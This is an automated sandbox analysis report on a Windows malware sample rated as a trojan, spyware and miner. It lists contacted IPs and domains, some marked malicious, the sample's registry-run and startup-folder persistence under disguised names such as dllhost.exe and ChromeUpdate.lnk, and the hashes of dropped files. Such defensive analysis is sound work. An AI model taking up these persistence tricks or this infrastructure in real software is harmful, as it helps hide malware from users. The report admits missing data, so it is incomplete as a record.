    Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmp
    Malicious: false
    Antivirus detection: URL Reputation: safe
    Reputation: unknown

http://tempuri.org/Entity/Id3Response
    Source: 8EC4.exe, 00000028.00000002.1019624757.0000000002D58000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp
    Malicious: false
    Antivirus detection: URL Reputation: safe
    Reputation: unknown

http://schemas.xmlsoap.org/ws/2005/02/rm
    Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp
    Malicious: false
    Reputation: high

http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
    Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp
    Malicious: false
    Reputation: high

http://schemas.xmlsoap.org/soap/actor/next
    Source: 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp
    Malicious: false
    Reputation: high

https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp
    Malicious: false
    Reputation: high

http://service.r
    Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp
    Malicious: false
    Antivirus detection: URL Reputation: safe
    Reputation: unknown

http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
    Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp
    Malicious: false
    Reputation: high

                                                                                                                                                                                                        Contacted IPs


                                                                                                                                                                                                        Public

IP               Domain                                     Country              ASN     ASN Name                                           Malicious
185.163.45.70    unknown                                    Moldova Republic of  39798   MIVOCLOUDMD                                        false
185.215.113.35   unknown                                    Portugal             206894  WHOLESALECONNECTIONSNL                             true
188.166.28.199   unknown                                    Netherlands          14061   DIGITALOCEAN-ASNUS                                 true
86.107.197.138   unknown                                    Romania              39855   MOD-EUNL                                           false
54.38.220.85     unicupload.top                             France               16276   OVHFR                                              false
40.93.212.0      microsoft-com.mail.protection.outlook.com  United States        8075    MICROSOFT-CORP-MSN-AS-BLOCKUS                      false
104.21.38.221    goo.su                                     United States        13335   CLOUDFLARENETUS                                    false
93.189.42.167    host-data-coin-11.com                      Russian Federation   41853   NTCOM-ASRU                                         false
144.76.136.153   transfer.sh                                Germany              24940   HETZNER-ASDE                                       false
162.159.130.233  cdn.discordapp.com                         United States        13335   CLOUDFLARENETUS                                    false
185.233.81.115   unknown                                    Russian Federation   50113   SUPERSERVERSDATACENTERRU                           true
8.209.67.104     patmushta.info                             Singapore            45102   CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC   false
185.7.214.171    unknown                                    France               42652   DELUNETDE                                          true
185.186.142.166  unknown                                    Russian Federation   204490  ASKONTELRU                                         true
141.8.194.74     a0621298.xsph.ru                           Russian Federation   35278   SPRINTHOSTRU                                       false
185.163.204.22   unknown                                    Germany              20771   CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE         false
185.163.204.24   unknown                                    Germany              20771   CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE         true

                                                                                                                                                                                                        Private

IP
192.168.2.1

                                                                                                                                                                                                        General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 552969
Start date: 14.01.2022
Start time: 00:13:36
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 13s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: U3E7zMaux2.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 50
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.mine.winEXE@60/50@96/18
EGA Information:
• Successful, ratio: 92.3%
HDC Information:
• Successful, ratio: 47.6% (good quality ratio 37.6%)
• Quality average: 64%
• Quality standard deviation: 39%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 51.11.168.232, 23.203.70.208, 13.89.179.12, 40.91.112.76, 20.54.110.249, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 20.189.173.22
• Excluded domains from analysis (whitelisted): bitbucket.org, bbuseruploads.s3.amazonaws.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e11290.dspg.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, yandex.ru, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iplogger.org, settings-win.data.microsoft.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Execution Graph export aborted for target 8EC4.exe, PID 6240 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
00:15:09  Task Scheduler   Run new task: Firefox Default Browser Agent 8F76897F18632802 path: C:\Users\user\AppData\Roaming\uufaeea
00:15:24  API Interceptor  1x Sleep call for process: 7CA1.exe modified
00:15:32  API Interceptor  1x Sleep call for process: WerFault.exe modified
00:15:33  API Interceptor  8x Sleep call for process: svchost.exe modified
00:16:06  API Interceptor  4x Sleep call for process: 7801.exe modified
00:16:06  API Interceptor  414x Sleep call for process: mjlooy.exe modified
00:16:08  Task Scheduler   Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
00:16:22  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
00:16:34  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_e1.exe
00:16:45  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
00:16:57  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_e1.exe
00:17:09  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start ChromeUpdate.lnk

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D984.exe_bcd76db1fe5d7f46e1bf3aadcd0e64871c556_e6d2f5c0_1ad174c5\Report.wer
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                        Entropy (8bit):0.8140048802892536
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:z+FmDLAM1kOQoJ7R3V6tpXIQcQec6tycEfcw3m+HbHg/8BRTf3o8Fa9iVfOyWYmq:as3AMR8HQ0lbjIq/u7s9S274Itr
                                                                                                                                                                                                        MD5:A77187FFD082A4C6C4803FF0494824A7
                                                                                                                                                                                                        SHA1:35CF158AFC534025FE186F1FFAA6DC320623566D
                                                                                                                                                                                                        SHA-256:85DFD5A39411BA976F6A87B3D2915C9EECB867A37B34E4D13A0A267F8A1C74B8
                                                                                                                                                                                                        SHA-512:77B9FA28B7AF746B8DE7192F75C5EB76FBD493A3110CE4678A44CA748396B0C0552260B91BE7B3818C27F79EC56E5959CCC227BC0CC9525A73F7F5D6A7CE14EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.5.8.9.3.2.2.5.3.4.1.1.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.5.8.9.3.3.0.8.4.6.5.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.c.3.d.4.c.3.-.0.9.a.9.-.4.2.f.9.-.b.a.2.6.-.4.d.c.2.2.4.9.e.8.0.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.7.c.e.d.c.6.-.6.9.2.2.-.4.1.7.8.-.9.0.4.5.-.0.7.4.3.c.a.4.6.9.8.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.9.8.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.7.c.-.0.0.0.1.-.0.0.1.b.-.a.d.e.6.-.a.a.6.a.d.3.0.8.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.f.3.7.4.4.3.4.4.9.b.5.e.c.b.5.4.f.6.4.0.f.a.2.5.6.e.b.5.8.5.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.D.9.8.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E45.tmp.csv
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):59464
                                                                                                                                                                                                        Entropy (8bit):3.0415890459619677
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:rHHZvP5xQZDcKdcZRqoPikqjL/15hokyLNh2DqwixlV:rHHZvP5xQZDcKdcZRqoPikqjL/15hZyT
                                                                                                                                                                                                        MD5:BBF079652672E4A164C9D1F6600E9E1B
                                                                                                                                                                                                        SHA1:CB38376B0999BD10686C79A7341B27D7F6BBDAE7
                                                                                                                                                                                                        SHA-256:D506F771465D8185C355E35DFF9D7A75D004D0558E6BBC175E0AAED4E8281EBA
                                                                                                                                                                                                        SHA-512:060E0BA93F1113209B6CF858D67D965B0016D3521E2BC27EBDF7E1DECCC653512C37E3DCEDBC87A9052FED1106FD38102BD338D5FE1BF6FA0C4F36310AE9209D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER29CF.tmp.txt
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                        Entropy (8bit):2.6982673798413264
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9GiZYWzRIskYeYAWjqhHX+YEZCLtbimPZrZwhe22zaHjLcO3mIWy3:9jZD45yqnueTaHjLcO3hWy3
                                                                                                                                                                                                        MD5:1E3428F52B7045A77CFD7B0166F40F77
                                                                                                                                                                                                        SHA1:25F5A37E4DBE6DDCB22043B7284BAFCDA1645610
                                                                                                                                                                                                        SHA-256:B011C6766F78C6D95F95404ED5D3BF04BF9875F733ACE46F7641FDE96D27EFF6
                                                                                                                                                                                                        SHA-512:F2C9711D92BAD9C0EFA1B085C08913886B3E39BEAAF2ADE00ABAF4E0092BBDBECD4063EB5E91B89216E802565ED222E93840476860AF62B4CAAAA8C35A4EE43D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EAC.tmp.csv
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):54386
                                                                                                                                                                                                        Entropy (8bit):3.0523324327765002
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:/1HBybnA6sgK/x2PRj2nzhmRd1TuOc+3MSi:/1HBybnA6sgK/x2PRj2nzhmRd1TuD+3Y
                                                                                                                                                                                                        MD5:9E2A4C710BF0EF1AB96E0FBC83A94F97
                                                                                                                                                                                                        SHA1:451F103D667B3BC780C511CCC5A517F2E941BDD1
                                                                                                                                                                                                        SHA-256:25A919E83C233B48D3BE7CAFE118537F38C5F1E51868109C002E9ABD7F0DF830
                                                                                                                                                                                                        SHA-512:CAD7424179BF5EA01535947342D5517A6F9A4F5D1BA52E5D61F199145B1D5FF844A0885932C9D91C95DBCBC3C27772D359D15F518BFEA9E5E6774B049E20EC77
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER62F3.tmp.txt
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                        Entropy (8bit):2.6960340998589127
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9GiZYWUwJQffYfYkWjqv8HlYEZ+ct6iPPIc+Wwn64k7/aXURiRj6IKx3:9jZDAYWqvhF6P/aXURiRjtKx3
                                                                                                                                                                                                        MD5:7AF93D6F1A0032753A596F52EFCD1423
                                                                                                                                                                                                        SHA1:651104BA14D35EEB3171D1274F415351F61A623B
                                                                                                                                                                                                        SHA-256:39FAFCCC867A221D859CC815615344DE9CFF040779FEB82EE10566D0A96961B3
                                                                                                                                                                                                        SHA-512:C1B52BF2ED2D5EA3627C0BECD3A65121590843EEB6088A7FFFFE8600D7AC9872773A266998C5D61AD9D17871E3D79FA9E3718957813590036C64081B98923A5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6FE.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Thu Jan 13 23:15:23 2022, 0x1205a4 type
Category: dropped
Size (bytes): 42152
Entropy (8bit): 2.0055914487492963
Encrypted: false
SSDEEP: 192:nf+MTOf4LTvbOeh0k3O+Kyx1BQU+A8TxB1NCUVgyT85OtEGVP:oWieeHVLFuG5
MD5: 2A644774142729880A64441FCAE80948
SHA1: 3416A4D49E064E9D094FE99D1EB58DDE93630F17
SHA-256: 82AB2AD8EB0BB51F5B97E9F0FB3875BA4D6C6590267D95664C1F483C055AD5DD
SHA-512: 36B63A7E203E949B9798C0EE669014EE470A24FA2293995CE765DB5704E7D55C43390A2F7EBE4CEDCA9B07AD45894449F8E937E3FF993F9F850E859A208A1528
Malicious: false
Reputation: unknown
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD49.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8392
Entropy (8bit): 3.701438796962995
Encrypted: false
SSDEEP: 192:Rrl7r3GLNihr6n6YrPSUjgmfORSNQa+pDi89bQssfKwm:RrlsNid6n6YDSUjgmfORS6Q/f8
MD5: 66F461C0EC0330D64B5D27D1E42648D3
SHA1: F6F499237FE73C3A8B7B53D0EA42F47F6A0E5631
SHA-256: E7CA29D3A434B2ED3E585CA292AA9A055860117EB9423D0945F16F136301375A
SHA-512: 98F0238DD3C54F793BDB14C75935EC1255A197EB6B608F38F567A3A42FFA75C7A6D935BB22F7E00C1CB18E38539693FE61D2FBC968413E7AA53CE641C2656353
Malicious: false
Reputation: unknown
Preview (decoded from UTF-16, truncated as in the report):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
	<OSVersionInformation>
		<WindowsNTVersion>10.0</WindowsNTVersion>
		<Build>17134</Build>
		<Product>(0x30): Windows 10 Pro</Product>
		<Edition>Professional</Edition>
		<BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>
		<Revision>1</Revision>
		<Flavor>Multiprocessor Free</Flavor>
		<Architecture>X64</Architecture>
		<LCID>1033</LCID>
	</OSVersionInformation>
	<ProcessInformation>
		<Pid>5756</Pid>
	...
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE103.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4685
Entropy (8bit): 4.475981505955246
Encrypted: false
SSDEEP: 48:cvIwSD8zsCJgtWI9XfWSC8BZ8fm8M4JZ8qFcfi+q8vh8R6gxdAOHS3d:uITfQ0OSNoJiiKREAOHS3d
MD5: 867BAA274A448D5C6FE96CE722E9FF4A
SHA1: 353CF987A6D75C60C49B186B123D89FBF891B6EA
SHA-256: ECBECDDA4BE1B31B50F5B1D2AA05A0CAA15C954398FCD4E2DE76BA658B507E7B
SHA-512: 0CA515EAA2FED710FF3751D4D9EA6404DE814073C3B8C414087A447A64D64A3D3A408F2139B4972692E3AD04CA034A1891962BC35DB1F08942EEEEE3FC548A17
Malicious: false
Reputation: unknown
Preview (truncated as in the report):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
  <tlm>
    <src>
      <desc>
        <mach>
          <os>
            <arg nm="vermaj" val="10" />
            <arg nm="vermin" val="0" />
            <arg nm="verbld" val="17134" />
            <arg nm="vercsdbld" val="1" />
            <arg nm="verqfe" val="1" />
            <arg nm="csdbld" val="1" />
            <arg nm="versp" val="0" />
            <arg nm="arch" val="9" />
            <arg nm="lcid" val="1033" />
            <arg nm="geoid" val="244" />
            <arg nm="sku" val="48" />
            <arg nm="domain" val="0" />
            <arg nm="prodsuite" val="256" />
            <arg nm="ntprodtype" val="1" />
            <arg nm="platid" val="2" />
            <arg nm="tmsi" val="1341146" />
            <arg nm="osinsty" val="1" />
            <arg nm="iever" val="11.1.17134.0-11.0.47" />
            <arg nm="portos" val="0" />
            <arg nm="ram" val="4096" />
            ...
C:\Users\user\AppData\LocalLow\1xVPfvJcrg
Process: C:\Users\user\AppData\Local\Temp\7801.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\RYwTiizs2t
Process: C:\Users\user\AppData\Local\Temp\7801.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
